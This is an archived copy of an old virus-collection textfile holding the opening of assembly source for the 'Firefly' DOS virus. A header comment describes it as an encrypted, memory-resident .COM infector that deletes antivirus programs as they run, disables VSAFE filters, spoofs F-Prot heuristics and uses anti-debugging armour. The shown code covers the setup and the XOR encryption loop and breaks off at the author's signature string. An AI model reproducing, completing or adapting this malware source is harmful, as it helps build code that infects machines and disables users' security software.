💾 Archived View for spam.works › mirrors › textfiles › virus › firefly.txt captured on 2023-11-14 at 12:50:49.
⬅️ Previous capture (2023-06-16)
-=-=-=-=-=-=-
;FIREFLY virus, by Nikademus. ; ;Firefly is an encrypted, memory resident virus which infects ;.COMfiles on load. It incorporates code from Proto-T, ;LokJaw and YB-X viruses and, when in memory, attacks a large selection ;of anti-virus programs as they are executed. Anti-virus programs ;identified by Firefly's execute/load handler are deleted. ;Firefly incorporates simple code from previous issues of the newsletter ;designed to de-install generic VSAFE resident virus activity ;filters designed for Microsoft by Central Point Software. It ;contains instructions - specifically a segment of pseudo-nested ;loops - which spoof F-Protect's expert system generic virus ;identification feature. ; ;FIREFLY also includes a visual marker tied to the system timer ;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock ;and ScrollLock LEDs on the keyboard. This produces a noticeable ;twinkling effect when the virus is active on a machine. ; ;Anti-anti-virus measures used by Firefly vary in effectiveness ;dependent upon how a user employs software. For example, while ;Firefly is designed to delete the Victor Charlie anti-virus ;shell, VC.EXE, a user who employs the software packages utilities ;for generic virus detection singly, will not be interfered with ;by the virus. Your results may vary, but the virus does effectively ;delete anti-virus programs while in memory unless steps are taken ;beforehand to avoid this. ; ;Firefly incorporates minor code armoring techniques designed to thwart ;trivial debugging. .radix 16 code segment model small assume cs:code, ds:code, es:code org 100h len equ offset last - start vir_len equ len / 16d ; 16 bytes per paragraph encryptlength equ (last - begin)/4+1 start: mov bx, offset begin ; The Encryption Head mov cx, encryptlength ; encryption_loop: ; db 81h ; XOR WORD PTR [BX], ????h db 37h ; encryption_value_1: ; dw 0000h ; ; db 81h ; XOR WORD PTR [BX+2], ????h db 77h ; db 02h ; 2 different random words encryption_value_2: ; give 32-bit encryption dw 0000h ; add bx, 4 ; loop encryption_loop ; begin: jmp virus db '[Firefly] By Nikademus